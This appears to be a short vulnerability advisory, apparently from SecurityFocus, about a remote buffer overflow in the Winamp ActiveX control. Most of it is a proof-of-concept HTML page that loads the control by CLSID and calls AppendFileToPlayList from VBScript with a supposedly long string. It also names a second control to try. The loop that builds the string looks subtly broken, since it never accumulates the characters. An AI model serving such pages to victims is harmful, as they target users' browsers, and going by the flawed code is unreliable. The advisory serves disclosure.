Nullsoft Winamp ActiveX Control Remote Buffer Overflow Vulnerability

Nullsoft Winamp ActiveX Control Remote Buffer Overflow Vulnerability

The following proof of concept is available:
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=Kylie height=250 hspace=20 width=250 align=left classid=clsid:FA3662C3-
B8E8-11D6-A667-0010B556D978>
<PARAM NAME="Initialize" VALUE="">
</OBJECT>
<SCRIPT language=vbscript>

dim xint
dim haveIgotthebestbumorwhat
for xint = 1 to 5000
haveIgotthebestbumorwhat = foo & "K"
next
Kylie.AppendFileToPlayList haveIgotthebestbumorwhat

</SCRIPT>
</BODY></HTML>

If you're bored could also try -

CoAxTrack Class - {B9F3009B-976B-41C4-A992-229DCCF3367C}.

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.